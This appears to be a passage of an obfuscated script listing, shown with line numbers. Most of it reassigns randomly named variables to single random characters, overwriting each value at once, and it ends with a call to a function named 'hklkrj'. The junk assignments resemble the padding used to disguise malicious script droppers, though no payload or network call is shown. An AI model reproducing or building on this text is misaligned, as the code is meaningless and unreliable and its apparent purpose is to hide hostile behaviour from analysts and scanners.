714 | xaubda = "M"; | |
715 | xaubda = "Y"; | |
716 | xaubda = "X"; | |
717 | xaubda = "N"; | |
718 | xaubda = "I"; | |
719 | xaubda = "Q"; | |
720 | xaubda = "T"; | |
721 | xaubda = "q"; | |
722 | xaubda = "z"; | |
723 | xaubda = "g"; | |
724 | xaubda = "I"; | |
725 | xaubda = "O"; | |
726 | xaubda = "g"; | |
727 | xaubda = "z"; | |
728 | xaubda = "w"; | |
729 | sgwurxqq = "Z"; | |
730 | sgwurxqq = "T"; | |
731 | sgwurxqq = "I"; | |
732 | sgwurxqq = "R"; | |
733 | ygkhlqcpi = "V"; | |
734 | ygkhlqcpi = "F"; | |
735 | ygkhlqcpi = "s"; | |
736 | ygkhlqcpi = "L"; | |
737 | ygkhlqcpi = "E"; | |
738 | ygkhlqcpi = "z"; | |
739 | ygkhlqcpi = "T"; | |
740 | ygkhlqcpi = "T"; | |
741 | ygkhlqcpi = "O"; | |
742 | ygkhlqcpi = "c"; | |
743 | ygkhlqcpi = "W"; | |
744 | ygkhlqcpi = "D"; | |
745 | ygkhlqcpi = "q"; | |
746 | ygkhlqcpi = "J"; | |
747 | ygkhlqcpi = "H"; | |
748 | ygkhlqcpi = "v"; | |
749 | ygkhlqcpi = "X"; | |
750 | ygkhlqcpi = "J"; | |
751 | ygkhlqcpi = "m"; | |
752 | ygkhlqcpi = "s"; | |
753 | ygkhlqcpi = "w"; | |
754 | ygkhlqcpi = "t"; | |
755 | ygkhlqcpi = "P"; | |
756 | ygkhlqcpi = "q"; | |
757 | ygkhlqcpi = " "; | |
758 | hcweynt = "M"; | |
759 | hcweynt = "d"; | |
760 | hcweynt = "x"; | |
761 | hcweynt = "G"; | |
762 | hcweynt = "v"; | |
763 | hcweynt = "O"; | |
764 | hcweynt = "x"; | |
765 | hcweynt = "X"; | |
766 | hcweynt = "S"; | |
767 | hcweynt = "G"; | |
768 | hcweynt = "a"; | |
769 | hcweynt = "O"; | |
770 | hcweynt = "g"; | |
771 | hcweynt = "Y"; | |
772 | hcweynt = "B"; | |
773 | hcweynt = "j"; | |
774 | hcweynt = "w"; | |
775 | hcweynt = "i"; | |
776 | hcweynt = "U"; | |
777 | hcweynt = "z"; | |
778 | hcweynt = "p"; | |
779 | hcweynt = "P"; | |
780 | hcweynt = "i"; | |
781 | hcweynt = "d"; | |
782 | hcweynt = "l"; | |
783 | hcweynt = "u"; | |
784 | hcweynt = "f"; | |
785 | hcweynt = "n"; | |
786 | hcweynt = "s"; | |
787 | hcweynt = "d"; | |
788 | rhxluc = "R"; | |
789 | rhxluc = "i"; | |
790 | rhxluc = "c"; | |
791 | rhxluc = "J"; | |
792 | rhxluc = "F"; | |
793 | rhxluc = "r"; | |
794 | rhxluc = "W"; | |
795 | rhxluc = "F"; | |
796 | rhxluc = "b"; | |
797 | rhxluc = "i"; | |
798 | rhxluc = "O"; | |
799 | rhxluc = "Z"; | |
800 | rhxluc = "K"; | |
801 | rhxluc = "K"; | |
802 | rhxluc = "t"; | |
803 | rhxluc = "U"; | |
804 | rhxluc = "R"; | |
805 | rhxluc = "Q"; | |
806 | rhxluc = "m"; | |
807 | rhxluc = "K"; | |
808 | rhxluc = "W"; | |
809 | rhxluc = "O"; | |
810 | rhxluc = "q"; | |
811 | rhxluc = "s"; | |
812 | rhxluc = "a"; | |
813 | rhxluc = "J"; | |
814 | rhxluc = "h"; | |
815 | rhxluc = "O"; | |
816 | rhxluc = "B"; | |
817 | rhxluc = "M"; | |
818 | rhxluc = "H"; | |
819 | rhxluc = "m"; | |
820 | rhxluc = "V"; | |
821 | rhxluc = "A"; | |
822 | rhxluc = "e"; | |
823 | rhxluc = "n"; | |
824 | rhxluc = "o"; | |
825 | rhxluc = "p"; | |
826 | rhxluc = "N"; | |
827 | rhxluc = "P"; | |
828 | rhxluc = "T"; | |
829 | rhxluc = "l"; | |
830 | rhxluc = "D"; | |
831 | rhxluc = "3"; | |
832 | okuoocl = "m"; | |
833 | okuoocl = "k"; | |
834 | okuoocl = "B"; | |
835 | okuoocl = "S"; | |
836 | okuoocl = "P"; | |
837 | okuoocl = "c"; | |
838 | okuoocl = "S"; | |
839 | okuoocl = "f"; | |
840 | okuoocl = "O"; | |
841 | okuoocl = "y"; | |
842 | okuoocl = "y"; | |
843 | okuoocl = "x"; | |
844 | okuoocl = "a"; | |
845 | okuoocl = "g"; | |
846 | okuoocl = "w"; | |
847 | okuoocl = "R"; | |
848 | okuoocl = "t"; | |
849 | okuoocl = "r"; | |
850 | okuoocl = "W"; | |
851 | okuoocl = "R"; | |
852 | okuoocl = "j"; | |
853 | okuoocl = "p"; | |
854 | okuoocl = "v"; | |
855 | okuoocl = "j"; | |
856 | okuoocl = "d"; | |
857 | okuoocl = "S"; | |
858 | okuoocl = "t"; | |
859 | okuoocl = "v"; | |
860 | okuoocl = "-"; | |
861 | jllafai = "c"; | |
862 | jllafai = "A"; | |
863 | jllafai = "V"; | |
864 | jllafai = "a"; | |
865 | jllafai = "b"; | |
866 | jllafai = "Q"; | |
867 | jllafai = "K"; | |
868 | jllafai = "T"; | |
869 | jllafai = "R"; | |
870 | jllafai = "o"; | |
871 | jllafai = "h"; | |
872 | jllafai = "C"; | |
873 | jllafai = "i"; | |
874 | jllafai = "k"; | |
875 | jllafai = "H"; | |
876 | jllafai = "b"; | |
877 | jllafai = "_"; | |
878 | bhdracz = "u"; | |
879 | bhdracz = "w"; | |
880 | bhdracz = "k"; | |
881 | bhdracz = "G"; | |
882 | bhdracz = "J"; | |
883 | bhdracz = "s"; | |
884 | bhdracz = "g"; | |
885 | bhdracz = "R"; | |
886 | bhdracz = "w"; | |
887 | bhdracz = "w"; | |
888 | bhdracz = "M"; | |
889 | bhdracz = "K"; | |
890 | bhdracz = "u"; | |
891 | bhdracz = "J"; | |
892 | bhdracz = "I"; | |
893 | bhdracz = "H"; | |
894 | bhdracz = "m"; | |
895 | bhdracz = "J"; | |
896 | bhdracz = "Q"; | |
897 | bhdracz = "b"; | |
898 | ojwvtwt = "q"; | |
899 | ojwvtwt = "a"; | |
900 | ojwvtwt = "k"; | |
901 | ojwvtwt = "X"; | |
902 | ojwvtwt = "J"; | |
903 | ojwvtwt = "g"; | |
904 | ojwvtwt = "m"; | |
905 | ojwvtwt = "J"; | |
906 | ojwvtwt = "J"; | |
907 | ojwvtwt = "h"; | |
908 | ojwvtwt = "L"; | |
909 | ojwvtwt = "Q"; | |
910 | ojwvtwt = "y"; | |
911 | ojwvtwt = "Q"; | |
912 | ojwvtwt = "l"; | |
913 | ojwvtwt = "E"; | |
914 | ojwvtwt = "p"; | |
915 | ojwvtwt = "x"; | |
916 | ojwvtwt = "N"; | |
917 | ojwvtwt = "f"; | |
918 | ojwvtwt = "a"; | |
919 | ojwvtwt = "a"; | |
920 | ojwvtwt = "Y"; | |
921 | ojwvtwt = "R"; | |
922 | ojwvtwt = "h"; | |
923 | ojwvtwt = "Q"; | |
924 | ojwvtwt = "U"; | |
925 | ojwvtwt = "E"; | |
926 | ojwvtwt = "I"; | |
927 | ojwvtwt = "M"; | |
928 | ojwvtwt = "D"; | |
929 | ojwvtwt = "Q"; | |
930 | ojwvtwt = "R"; | |
931 | ojwvtwt = "c"; | |
932 | ojwvtwt = "j"; | |
933 | ojwvtwt = "j"; | |
934 | ojwvtwt = "U"; | |
935 | ojwvtwt = "b"; | |
936 | ojwvtwt = "R"; | |
937 | ojwvtwt = "r"; | |
938 | ojwvtwt = "X"; | |
939 | ojwvtwt = "u"; | |
940 | ojwvtwt = "&"; | |
941 | ecfomon = "I"; | |
942 | ecfomon = "T"; | |
943 | ecfomon = "@"; | |
944 | cqhno = "P"; | |
945 | cqhno = "W"; | |
946 | cqhno = "q"; | |
947 | cqhno = "i"; | |
948 | cqhno = "l"; | |
949 | cqhno = "i"; | |
950 | cqhno = "D"; | |
951 | cqhno = "k"; | |
952 | cqhno = "b"; | |
953 | cqhno = "f"; | |
954 | cqhno = "U"; | |
955 | cqhno = ":"; | |
956 | lqsubtu = "R"; | |
957 | lqsubtu = "R"; | |
958 | lqsubtu = "V"; | |
959 | lqsubtu = "W"; | |
960 | lqsubtu = "F"; | |
961 | lqsubtu = "D"; | |
962 | lqsubtu = "c"; | |
963 | lqsubtu = "v"; | |
964 | lqsubtu = "w"; | |
965 | lqsubtu = "B"; | |
966 | lqsubtu = "l"; | |
967 | lqsubtu = "I"; | |
968 | lqsubtu = "N"; | |
969 | lqsubtu = "Y"; | |
970 | lqsubtu = "W"; | |
971 | lqsubtu = "V"; | |
972 | lqsubtu = "Y"; | |
973 | lqsubtu = "u"; | |
974 | lqsubtu = "V"; | |
975 | lqsubtu = "V"; | |
976 | lqsubtu = "i"; | |
977 | lqsubtu = "U"; | |
978 | lqsubtu = "L"; | |
979 | lqsubtu = "s"; | |
980 | lqsubtu = "h"; | |
981 | lqsubtu = "U"; | |
982 | lqsubtu = "f"; | |
983 | lqsubtu = "k"; | |
984 | qqpriorpn = "b"; | |
985 | qqpriorpn = "U"; | |
986 | qqpriorpn = "Z"; | |
987 | qqpriorpn = "j"; | |
988 | qqpriorpn = "b"; | |
989 | qqpriorpn = "p"; | |
990 | qqpriorpn = "n"; | |
991 | qqpriorpn = "L"; | |
992 | qqpriorpn = "y"; | |
993 | qqpriorpn = "e"; | |
994 | qqpriorpn = "h"; | |
995 | qqpriorpn = "T"; | |
996 | qqpriorpn = "O"; | |
997 | qqpriorpn = "j"; | |
998 | qqpriorpn = "j"; | |
999 | qqpriorpn = "V"; | |
1000 | qqpriorpn = "U"; | |
1001 | qqpriorpn = "z"; | |
1002 | qqpriorpn = "s"; | |
1003 | qqpriorpn = "Q"; | |
1004 | qqpriorpn = "q"; | |
1005 | qqpriorpn = "O"; | |
1006 | qqpriorpn = "Z"; | |
1007 | qqpriorpn = "o"; | |
1008 | fxhtfcosd = "K"; | |
1009 | fxhtfcosd = "s"; | |
1010 | fxhtfcosd = "a"; | |
1011 | fxhtfcosd = "2"; | |
1012 | cthvquqxs = "h"; | |
1013 | cthvquqxs = "O"; | |
1014 | cthvquqxs = "J"; | |
1015 | cthvquqxs = "I"; | |
1016 | cthvquqxs = "y"; | |
1017 | cthvquqxs = "T"; | |
1018 | cthvquqxs = "s"; | |
1019 | cthvquqxs = "p"; | |
1020 | cthvquqxs = "T"; | |
1021 | cthvquqxs = "U"; | |
1022 | cthvquqxs = "p"; | |
1023 | cthvquqxs = "n"; | |
1024 | cthvquqxs = "l"; | |
1025 | cthvquqxs = "B"; | |
1026 | cthvquqxs = "I"; | |
1027 | cthvquqxs = "u"; | |
1028 | cthvquqxs = "A"; | |
1029 | cthvquqxs = "U"; | |
1030 | cthvquqxs = "N"; | |
1031 | cthvquqxs = "Z"; | |
1032 | cthvquqxs = "S"; | |
1033 | cthvquqxs = "g"; | |
1034 | cthvquqxs = "z"; | |
1035 | cthvquqxs = "T"; | |
1036 | cthvquqxs = "D"; | |
1037 | cthvquqxs = "m"; | |
1038 | cthvquqxs = "D"; | |
1039 | cthvquqxs = "q"; | |
1040 | cthvquqxs = "q"; | |
1041 | cthvquqxs = "V"; | |
1042 | cthvquqxs = "P"; | |
1043 | cthvquqxs = "b"; | |
1044 | cthvquqxs = "s"; | |
1045 | cthvquqxs = "N"; | |
1046 | cthvquqxs = "Z"; | |
1047 | cthvquqxs = "w"; | |
1048 | cthvquqxs = "M"; | |
1049 | cthvquqxs = "K"; | |
1050 | cthvquqxs = "o"; | |
1051 | cthvquqxs = "W"; | |
1052 | cthvquqxs = "S"; | |
1053 | cthvquqxs = "Y"; | |
1054 | cthvquqxs = "W"; | |
1055 | cthvquqxs = "O"; | |
1056 | dilwipyvn = "l"; | |
1057 | dilwipyvn = "K"; | |
1058 | dilwipyvn = "u"; | |
1059 | dilwipyvn = "F"; | |
1060 | dilwipyvn = "i"; | |
1061 | dilwipyvn = "D"; | |
1062 | dilwipyvn = "k"; | |
1063 | dilwipyvn = "p"; | |
1064 | dilwipyvn = "M"; | |
1065 | dilwipyvn = "J"; | |
1066 | dilwipyvn = "p"; | |
1067 | dilwipyvn = "p"; | |
1068 | dilwipyvn = "j"; | |
1069 | dilwipyvn = "x"; | |
1070 | dilwipyvn = "K"; | |
1071 | dilwipyvn = "f"; | |
1072 | dilwipyvn = "q"; | |
1073 | dilwipyvn = "m"; | |
1074 | dilwipyvn = "K"; | |
1075 | dilwipyvn = "K"; | |
1076 | dilwipyvn = "E"; | |
1077 | dilwipyvn = "Y"; | |
1078 | dilwipyvn = "Q"; | |
1079 | dilwipyvn = "g"; | |
1080 | dilwipyvn = "d"; | |
1081 | dilwipyvn = "C"; | |
1082 | tyasnrv = "i"; | |
1083 | tyasnrv = "Z"; | |
1084 | tyasnrv = "F"; | |
1085 | tyasnrv = "d"; | |
1086 | tyasnrv = "w"; | |
1087 | tyasnrv = "v"; | |
1088 | tyasnrv = "c"; | |
1089 | tyasnrv = "E"; | |
1090 | tyasnrv = "j"; | |
1091 | tyasnrv = "F"; | |
1092 | tyasnrv = "x"; | |
1093 | tyasnrv = "s"; | |
1094 | tyasnrv = "s"; | |
1095 | tyasnrv = "T"; | |
1096 | tyasnrv = "V"; | |
1097 | tyasnrv = "y"; | |
1098 | tyasnrv = "n"; | |
1099 | tyasnrv = "m"; | |
1100 | tyasnrv = "i"; | |
1101 | tyasnrv = "E"; | |
1102 | tyasnrv = "y"; | |
1103 | tyasnrv = "Q"; | |
1104 | tyasnrv = "z"; | |
1105 | tyasnrv = "O"; | |
1106 | tyasnrv = "U"; | |
1107 | tyasnrv = "k"; | |
1108 | tyasnrv = "p"; | |
1109 | mnghaoct = "W"; | |
1110 | mnghaoct = "X"; | |
1111 | mnghaoct = "U"; | |
1112 | mnghaoct = "k"; | |
1113 | mnghaoct = "O"; | |
1114 | mnghaoct = "v"; | |
1115 | mnghaoct = "a"; | |
1116 | mnghaoct = "u"; | |
1117 | mnghaoct = "b"; | |
1118 | mnghaoct = "g"; | |
1119 | mnghaoct = "j"; | |
1120 | mnghaoct = "w"; | |
1121 | mnghaoct = "S"; | |
1122 | mnghaoct = "F"; | |
1123 | mnghaoct = "p"; | |
1124 | mnghaoct = "K"; | |
1125 | mnghaoct = "j"; | |
1126 | mnghaoct = "y"; | |
1127 | mnghaoct = "Y"; | |
1128 | mnghaoct = "I"; | |
1129 | mnghaoct = "x"; | |
1130 | mnghaoct = "J"; | |
1131 | mnghaoct = "F"; | |
1132 | mnghaoct = "F"; | |
1133 | mnghaoct = "A"; | |
1134 | mnghaoct = "S"; | |
1135 | mnghaoct = "B"; | |
1136 | mnghaoct = "k"; | |
1137 | mnghaoct = "G"; | |
1138 | mnghaoct = "m"; | |
1139 | mnghaoct = "e"; | |
1140 | mnghaoct = "e"; | |
1141 | mnghaoct = "K"; | |
1142 | mnghaoct = "V"; | |
1143 | mnghaoct = "\""; | |
1144 | nhsvpav = "E"; | |
1145 | nhsvpav = "Z"; | |
1146 | nhsvpav = "t"; | |
1147 | nhsvpav = "G"; | |
1148 | nhsvpav = "F"; | |
1149 | nhsvpav = "j"; | |
1150 | nhsvpav = "R"; | |
1151 | nhsvpav = "j"; | |
1152 | nhsvpav = "y"; | |
1153 | nhsvpav = "K"; | |
1154 | nhsvpav = "z"; | |
1155 | nhsvpav = "P"; | |
1156 | nhsvpav = "q"; | |
1157 | nhsvpav = "G"; | |
1158 | nhsvpav = "F"; | |
1159 | nhsvpav = "w"; | |
1160 | nhsvpav = "D"; | |
1161 | nhsvpav = "F"; | |
1162 | nhsvpav = "q"; | |
1163 | nhsvpav = "Z"; | |
1164 | nhsvpav = "c"; | |
1165 | nhsvpav = "h"; | |
1166 | nhsvpav = "V"; | |
1167 | nhsvpav = "P"; | |
1168 | nhsvpav = "l"; | |
1169 | nhsvpav = "e"; | |
1170 | nhsvpav = "A"; | |
1171 | nhsvpav = "W"; | |
1172 | nhsvpav = "G"; | |
1173 | nhsvpav = "d"; | |
1174 | nhsvpav = "Z"; | |
1175 | nhsvpav = "w"; | |
1176 | nhsvpav = "U"; | |
1177 | nhsvpav = "s"; | |
1178 | nhsvpav = "d"; | |
1179 | nhsvpav = "S"; | |
1180 | nhsvpav = "h"; | |
1181 | eekifdd = "O"; | |
1182 | eekifdd = "Q"; | |
1183 | eekifdd = "j"; | |
1184 | eekifdd = "i"; | |
1185 | eekifdd = "s"; | |
1186 | eekifdd = "j"; | |
1187 | eekifdd = "z"; | |
1188 | eekifdd = "R"; | |
1189 | eekifdd = "l"; | |
1190 | eekifdd = "y"; | |
1191 | eekifdd = "r"; | |
1192 | eekifdd = "F"; | |
1193 | eekifdd = "s"; | |
1194 | eekifdd = "a"; | |
1195 | eekifdd = "j"; | |
1196 | eekifdd = "a"; | |
1197 | eekifdd = "W"; | |
1198 | eekifdd = "w"; | |
1199 | eekifdd = "D"; | |
1200 | eekifdd = "H"; | |
1201 | eekifdd = "e"; | |
1202 | xnhyodih = "P"; | |
1203 | xnhyodih = "S"; | |
1204 | xnhyodih = "w"; | |
1205 | xnhyodih = "U"; | |
1206 | xnhyodih = "N"; | |
1207 | xnhyodih = "Y"; | |
1208 | xnhyodih = "x"; | |
1209 | xnhyodih = "H"; | |
1210 | xnhyodih = "p"; | |
1211 | xnhyodih = "s"; | |
1212 | xnhyodih = "Z"; | |
1213 | xnhyodih = "W"; | |
1214 | xnhyodih = "M"; | |
1215 | xnhyodih = "e"; | |
1216 | xnhyodih = "M"; | |
1217 | xnhyodih = "z"; | |
1218 | xnhyodih = "Q"; | |
1219 | xnhyodih = "i"; | |
1220 | xnhyodih = "v"; | |
1221 | xnhyodih = "y"; | |
1222 | xnhyodih = "k"; | |
1223 | xnhyodih = "g"; | |
1224 | xnhyodih = "y"; | |
1225 | xnhyodih = "o"; | |
1226 | xnhyodih = "L"; | |
1227 | xnhyodih = "W"; | |
1228 | xnhyodih = "C"; | |
1229 | xnhyodih = "C"; | |
1230 | xnhyodih = "z"; | |
1231 | xnhyodih = "y"; | |
1232 | xnhyodih = "r"; | |
1233 | xnhyodih = "g"; | |
1234 | qzlntz = "F"; | |
1235 | qzlntz = "Y"; | |
1236 | qzlntz = "J"; | |
1237 | qzlntz = "V"; | |
1238 | qzlntz = "S"; | |
1239 | qzlntz = "c"; | |
1240 | qzlntz = "B"; | |
1241 | qzlntz = "k"; | |
1242 | qzlntz = "m"; | |
1243 | qzlntz = "d"; | |
1244 | qzlntz = "t"; | |
1245 | qzlntz = "U"; | |
1246 | qzlntz = "p"; | |
1247 | qzlntz = "j"; | |
1248 | qzlntz = "z"; | |
1249 | qzlntz = "B"; | |
1250 | qzlntz = "e"; | |
1251 | qzlntz = "s"; | |
1252 | qzlntz = "U"; | |
1253 | qzlntz = "a"; | |
1254 | qzlntz = "F"; | |
1255 | qzlntz = "U"; | |
1256 | qzlntz = "v"; | |
1257 | qzlntz = "M"; | |
1258 | qzlntz = "z"; | |
1259 | qzlntz = "T"; | |
1260 | qzlntz = "E"; | |
1261 | qzlntz = "R"; | |
1262 | qzlntz = "%"; | |
1263 | stkiohn = "N"; | |
1264 | stkiohn = "a"; | |
1265 | stkiohn = "C"; | |
1266 | stkiohn = "t"; | |
1267 | stkiohn = "N"; | |
1268 | stkiohn = "p"; | |
1269 | stkiohn = "p"; | |
1270 | stkiohn = "F"; | |
1271 | stkiohn = "p"; | |
1272 | stkiohn = "v"; | |
1273 | stkiohn = "D"; | |
1274 | stkiohn = "I"; | |
1275 | bhfwystna = "B"; | |
1276 | bhfwystna = "v"; | |
1277 | bhfwystna = "N"; | |
1278 | bhfwystna = "K"; | |
1279 | bhfwystna = "Y"; | |
1280 | bhfwystna = "t"; | |
1281 | bhfwystna = "R"; | |
1282 | bhfwystna = "D"; | |
1283 | bhfwystna = "I"; | |
1284 | bhfwystna = "p"; | |
1285 | bhfwystna = "P"; | |
1286 | bhfwystna = "t"; | |
1287 | bhfwystna = "k"; | |
1288 | bhfwystna = "q"; | |
1289 | bhfwystna = "i"; | |
1290 | bhfwystna = "S"; | |
1291 | bhfwystna = "s"; | |
1292 | bhfwystna = "W"; | |
1293 | bhfwystna = "s"; | |
1294 | bhfwystna = "q"; | |
1295 | tvavsdkww = "Q"; | |
1296 | tvavsdkww = "R"; | |
1297 | tvavsdkww = "A"; | |
1298 | tvavsdkww = "p"; | |
1299 | tvavsdkww = "l"; | |
1300 | tvavsdkww = "E"; | |
1301 | tvavsdkww = "e"; | |
1302 | tvavsdkww = "n"; | |
1303 | tvavsdkww = "s"; | |
1304 | tvavsdkww = "v"; | |
1305 | tvavsdkww = "h"; | |
1306 | tvavsdkww = "Q"; | |
1307 | tvavsdkww = "F"; | |
1308 | tvavsdkww = "T"; | |
1309 | tvavsdkww = "P"; | |
1310 | tvavsdkww = "R"; | |
1311 | tvavsdkww = "a"; | |
1312 | tvavsdkww = "E"; | |
1313 | tvavsdkww = "t"; | |
1314 | tvavsdkww = "H"; | |
1315 | tvavsdkww = "I"; | |
1316 | tvavsdkww = "l"; | |
1317 | tvavsdkww = "M"; | |
1318 | tvavsdkww = "F"; | |
1319 | tvavsdkww = "f"; | |
1320 | tvavsdkww = "p"; | |
1321 | tvavsdkww = "v"; | |
1322 | hetou = "A"; | |
1323 | hetou = "R"; | |
1324 | hetou = "A"; | |
1325 | hetou = "v"; | |
1326 | hetou = "V"; | |
1327 | hetou = "v"; | |
1328 | hetou = "r"; | |
1329 | hetou = "a"; | |
1330 | hetou = "C"; | |
1331 | hetou = "l"; | |
1332 | hetou = "S"; | |
1333 | hetou = "r"; | |
1334 | hetou = "I"; | |
1335 | hetou = "Y"; | |
1336 | hetou = "R"; | |
1337 | hetou = "w"; | |
1338 | hetou = "D"; | |
1339 | hetou = "p"; | |
1340 | hetou = "N"; | |
1341 | rmmcclk = "u"; | |
1342 | rmmcclk = "d"; | |
1343 | rmmcclk = "d"; | |
1344 | rmmcclk = "C"; | |
1345 | rmmcclk = "x"; | |
1346 | rmmcclk = "H"; | |
1347 | rmmcclk = "S"; | |
1348 | rmmcclk = "u"; | |
1349 | rmmcclk = "H"; | |
1350 | rmmcclk = "Y"; | |
1351 | rmmcclk = "U"; | |
1352 | rmmcclk = "M"; | |
1353 | rmmcclk = "l"; | |
1354 | rmmcclk = "i"; | |
1355 | rmmcclk = "z"; | |
1356 | rmmcclk = "m"; | |
1357 | rmmcclk = "l"; | |
1358 | rmmcclk = "q"; | |
1359 | rmmcclk = "i"; | |
1360 | rmmcclk = "p"; | |
1361 | rmmcclk = "c"; | |
1362 | rmmcclk = "P"; | |
1363 | rmmcclk = "\\"; | |
1364 | nrzkeuium = "N"; | |
1365 | nrzkeuium = "p"; | |
1366 | nrzkeuium = "u"; | |
1367 | nrzkeuium = "c"; | |
1368 | nrzkeuium = "s"; | |
1369 | nrzkeuium = "h"; | |
1370 | nrzkeuium = "r"; | |
1371 | nrzkeuium = "G"; | |
1372 | nrzkeuium = "j"; | |
1373 | nrzkeuium = "K"; | |
1374 | nrzkeuium = "s"; | |
1375 | nrzkeuium = "X"; | |
1376 | nrzkeuium = "c"; | |
1377 | nrzkeuium = "e"; | |
1378 | nrzkeuium = "j"; | |
1379 | hcihhtsso = "o"; | |
1380 | hcihhtsso = "i"; | |
1381 | hcihhtsso = "e"; | |
1382 | hcihhtsso = "g"; | |
1383 | hcihhtsso = "s"; | |
1384 | hcihhtsso = "a"; | |
1385 | hcihhtsso = "Q"; | |
1386 | hcihhtsso = "."; | |
1387 | bglgejx = "p"; | |
1388 | bglgejx = "a"; | |
1389 | bglgejx = "x"; | |
1390 | bglgejx = "S"; | |
1391 | bglgejx = "h"; | |
1392 | bglgejx = "H"; | |
1393 | bglgejx = "s"; | |
1394 | bglgejx = "V"; | |
1395 | bglgejx = "y"; | |
1396 | bglgejx = "T"; | |
1397 | bglgejx = "r"; | |
1398 | bglgejx = "U"; | |
1399 | bglgejx = "D"; | |
1400 | bglgejx = "s"; | |
1401 | bglgejx = "H"; | |
1402 | bglgejx = "Y"; | |
1403 | bglgejx = "J"; | |
1404 | bglgejx = "O"; | |
1405 | bglgejx = "a"; | |
1406 | bglgejx = "J"; | |
1407 | bglgejx = "H"; | |
1408 | bglgejx = "n"; | |
1409 | bglgejx = "W"; | |
1410 | bglgejx = "S"; | |
1411 | bglgejx = "G"; | |
1412 | bglgejx = "F"; | |
1413 | bglgejx = "G"; | |
1414 | bglgejx = "p"; | |
1415 | bglgejx = "V"; | |
1416 | bglgejx = "Z"; | |
1417 | bglgejx = "s"; | |
1418 | zuseoyzcq = "R"; | |
1419 | zuseoyzcq = "V"; | |
1420 | zuseoyzcq = "G"; | |
1421 | zuseoyzcq = "a"; | |
1422 | zuseoyzcq = "i"; | |
1423 | zuseoyzcq = "Q"; | |
1424 | zuseoyzcq = "y"; | |
1425 | zuseoyzcq = "y"; | |
1426 | zuseoyzcq = "l"; | |
1427 | zuseoyzcq = "u"; | |
1428 | zuseoyzcq = "k"; | |
1429 | zuseoyzcq = "Q"; | |
1430 | zuseoyzcq = "K"; | |
1431 | zuseoyzcq = "m"; | |
1432 | zuseoyzcq = "Z"; | |
1433 | zuseoyzcq = "k"; | |
1434 | zuseoyzcq = "K"; | |
1435 | zuseoyzcq = "A"; | |
1436 | zuseoyzcq = "A"; | |
1437 | zuseoyzcq = "x"; | |
1438 | zuseoyzcq = "J"; | |
1439 | zuseoyzcq = "E"; | |
1440 | hoobuew = "U"; | |
1441 | hoobuew = "Q"; | |
1442 | hoobuew = "n"; | |
1443 | hoobuew = "d"; | |
1444 | hoobuew = "d"; | |
1445 | hoobuew = "h"; | |
1446 | hoobuew = "P"; | |
1447 | hoobuew = "s"; | |
1448 | hoobuew = "Q"; | |
1449 | hoobuew = "j"; | |
1450 | hoobuew = "S"; | |
1451 | hoobuew = "M"; | |
1452 | hoobuew = "Q"; | |
1453 | hoobuew = "Q"; | |
1454 | hoobuew = "C"; | |
1455 | hoobuew = "Y"; | |
1456 | hoobuew = "h"; | |
1457 | hoobuew = "F"; | |
1458 | hoobuew = "z"; | |
1459 | hoobuew = "M"; | |
1460 | hoobuew = "P"; | |
1461 | hklkrj ( ); |
|